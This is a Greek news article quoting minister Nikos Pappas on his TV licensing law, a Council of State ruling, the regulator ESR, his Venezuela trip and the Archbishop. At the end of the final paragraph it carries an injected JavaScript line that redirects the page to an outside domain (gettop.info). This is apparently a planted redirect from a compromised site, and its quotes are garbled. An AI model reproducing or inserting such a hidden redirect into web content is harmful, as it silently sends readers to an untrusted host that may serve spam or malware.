Παππάς: Δεν πέφτει ο νόμος Παππά – Πρόσκαιρο το φρένο του ΣτΕ

0
7

 

«Δεν πέφτει ο νόμος Παππά, δεν έχει πέσει ο νόμος (στο ΣτΕ). Το ΕΣΡ θα εφαρμόσει τον νόμο 4339 (νόμος Παππά) για την αδειοδότηση» διεμήνυσε ο Νίκος Παππάς, ενώ επέμεινε και στον νόμο – γέφυρα για τα κανάλια, αλλά και στον αριθμό «4» των αδειοδοτήσεων.

«Μένει ολόκληρος ο νόμος όπως είχε ψηφιστεί, η μόνη αλλαγή είναι ότι το ‘αιτιολογημένη γνώμη’’ του ΕΣΡ γίνεται «σύμφωνη»» πρόσθεσε ο υπουργός Επικρατείας. Μπήκε σε αυτήν τη διαδικασία πρόσκαιρο φρένο, ανέφερε, αλλά οδήγησε πλέον όλα τα κόμματα σε θέσεις λογικής. «Τυπικά δεν έχει καταπέσει ο διαγωνισμός (για την αδειοδότηση), συζητάμε επί των φημών» δήλωσε ο υπουργός Επικρατείας στον ΣΚΑΪ.

Ο υπουργός ξεκαθάρισε δε, ότι παρά τις αντιδράσεις της ΝΔ η κυβέρνηση θα επιμείνει στον όρο «αναστολή» για το νόμο Παππά, και δεν προτίθεται να τον αποσύρει.

Ο κ. Παππάς άφησε αιχμές και για την απόφαση του ΣτΕ δηλώνοντας ότι «το ΣτΕ λειτούργησε στη συγκεκριμένη υπόθεση με ταχύτητα διαστημική, αντίθετα με άλλες περιπτώσεις… Εμείς φτάσαμε μισό βήμα πριν την τελική αδειοδότηση και ρύθμιση, διχάστηκε ο νομικός κόσμος» ανέφερε χαρακτηριστικά ο υπουργός, ενώ έκανε λόγο για οριακή ψηφοφορία στην απόφαση του Ανωτάτου Δικαστηρίου και μόνο τη διάταξη για την αρμοδιότητα του υπουργού να αδειοδοτεί κανάλια.

Οι δικές μας οι πράξεις, είπε ήταν πράξεις ανάγκης όλες. Δεν ήταν νόμιμη η σύνθεση του ΕΣΡ και πέφτανε τα πρόστιμα, υπήρχε γνωμοδότηση του Νομικού Συμβουλίου του Κράτους.

Αν συγκροτηθεί ΕΣΡ την επομένη εβδομάδα, που το ευχόμαστε ολόκαρδα, και μας εγγυηθεί ότι σε σύντομο χρονικό διάστημα θα κάνουμε διαδικασία αδειοδότησης, αν όμως μας πει ότι θέλει δυο χρόνια το πολίτικο σύστημα όλο, όχι μόνο η κυβέρνηση, θα βρεθεί προ των ευθυνών.

«Διοργανώσαμε διαγωνισμό που εξασφάλισε το υψηλότερο δυνατό τίμημα για το δημόσιο» επέμεινε ο Νίκος Παπάς. Ο νόμος Παππά, πρόσθεσε, θέτει αυστηρότατες προϋποθέσεις για την εξασφάλιση άδειας, το τίμημα έρχεται τελευταίο.

«Δεν θα συγκυβερνήσει δια θεσμικού εκβιασμού η ΝΔ… Θέλει να νομοθετήσει η αξιωματική αντιπολίτευση… Αν δεν βρεθεί λύση για το ΕΣΡ θα είναι ακραία έκφραση θεσμικού εκβιασμού από τη ΝΔ» τόνισε ο υπουργός. Θα είναι τεράστιο το πολιτικό κόστος, αν μπλοκάρει τη συγκρότηση του ΕΣΡ.

«Είναι σαφές ότι από δω και πέρα το ΕΣΡ θα αδειοδοτεί τελεία και παύλα, οποιοσδήποτε διαγωνισμός θα γίνεται στο εξής από το ΕΣΡ, αλλά στοιχειώδη ρύθμιση θα πρέπει να κάνουμε» παρατήρησε ακόμη.

«Το ΕΣΡ θα εφαρμόσει τον νόμο 4339 για την αδειοδότηση… Το νόμο 4339 τον ψήφισαν τα κόμματα της συμπολίτευσης και σε αρκετά άρθρα του τα κόμματα της αντιπολίτευσης, 9 από τα 16 άρθρα. Ψηφίζουμε νομό που η καρδιά του έχει ψηφιστεί και από κόμματα της αντιπολίτευσης, και εφαρμόσαμε το Σύνταγμα σε όλα τα στάδια» σημείωσε.

Για το ταξίδι του στη Βενεζουέλα σχολίασε ότι «έκανα πολιτικό ταξίδι και αναπτύξαμε ιδέες και δυνατότητες συνεργασίες». «Δεν το είπα για αστείο τα περί σούπερ μάρκετ. Τα κρατικά σούπερ μάρκετ στη Βενεζουέλα προμηθεύονταν προϊόντα. με διακρατικές συμφωνίες» παρατήρησε.

Σύμφωνα με τον κ. Παππά, το ταξίδι έγινε 1,5 χρόνο πριν έρθει ο ΣΥΡΙΖΑ στην κυβέρνηση και διοργανώθηκε από την πρεσβεία της Βενεζουέλας. «Η Βενεζουέλα ήθελε ανάπτυξη σχέσεων με χώρες της Ευρώπης, ο κ. Σαμαράς δεν ήθελε, κακώς, τώρα η Βενεζουέλα έχει προβλήματα, άλλα είναι η χώρα με τα μεγαλύτερα βεβαιωμένα αποθέματα πετρελαίου, και Ισπανία, Κίνα και Ιταλία έχουν μεγάλες σχέσεις» ανέφερε.

Κατηγόρησε μάλιστα τη ΝΔ για ανεπιτυχή προσπάθεια συμψηφισμών με αφορμή το θέμα αυτό. «Οι βουλευτές της ΝΔ τρέχανε πανικόβλητοι όταν ψηφίζαμε την απαγόρευση να έχουν εταιρείες στο εξωτερικό». «Πρόκειται για εισαγόμενη προπαγάνδα, δοκιμάστηκε και στην Ισπανία (Podemos)» δήλωσε δε, παραπέμποντας στο σκάνδαλο Siemens, που όπως είπε ο υπουργός, αποδείχθηκε ότι χρηματοδοτούνταν ΠΑΣΟΚ και ΝΔ.

«Έχω δει 100 – 150 επενδυτές τι να κάνω δηλαδή, να κυνηγάω την κάθε σπέκουλα που εκτοξεύεται εναντίον μου; Ευχής έργον να είχαμε σχέσεις με τη Βενεζουέλα με τη χώρα με τα μεγαλύτερα βεβαιωμένα αποθέματα πετρελαίου» δήλωσε.

«Ο κ. Αρτεμίου είναι αρμόδιος να αποκαλύψει ό,τι θέλει για την επιχειρηματική του δραστηριότητα» πρόσθεσε για τον κύπριο δικηγόρο.

Όσον αφορά στις σκληρές δηλώσεις του Αρχιεπισκόπου κατά του υπουργού Παιδείας στον ΣΚΑΪ, ο υπουργός Επικρατείας δήλωσε ότι «ο κ. Ιερώνυμος μάς έχει συνηθίσει όλο τον προηγούμενο καιρό σε λόγια αγάπης, κατανόησης και ανοχής στο διαφορετικό και εύχομαι αυτή τη συνήθεια την καλή να την συνεχίσει».

Όπως τόνισε, δεν είναι σωστό η αντιπαράθεση να κλιμακώνεται και από τη μια και από την άλλη πλευρά. Θα πρέπει ο καθένας να αφοσιώνεται στο ρόλο του και να μην προκαλούνται τριβές που είναι αχρείαστες». Παράλληλα, αναφερόμενος στη δήλωση του κ. Ιερώνυμου ότι ο υπουργός Άμυνας τού είχε υποσχεθεί κλαίγοντας ότι θα ρίξει την κυβέρνηση αν τού το ζητούσε, ο Νίκος Παππάς είπε ότι δεν την άκουσε.

Αναφορικά με τα εντεινόμενα σενάρια περί πρόωρων εκλογών παρατήρησε πως «είναι αστεία πράγματα τα περί εκλογών… Επειδή είχαμε 14-11 για το ΕΣΡ στο ΣτΕ θα πάμε σε εκλογές, ε, αυτά είναι αστεία πράγματα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here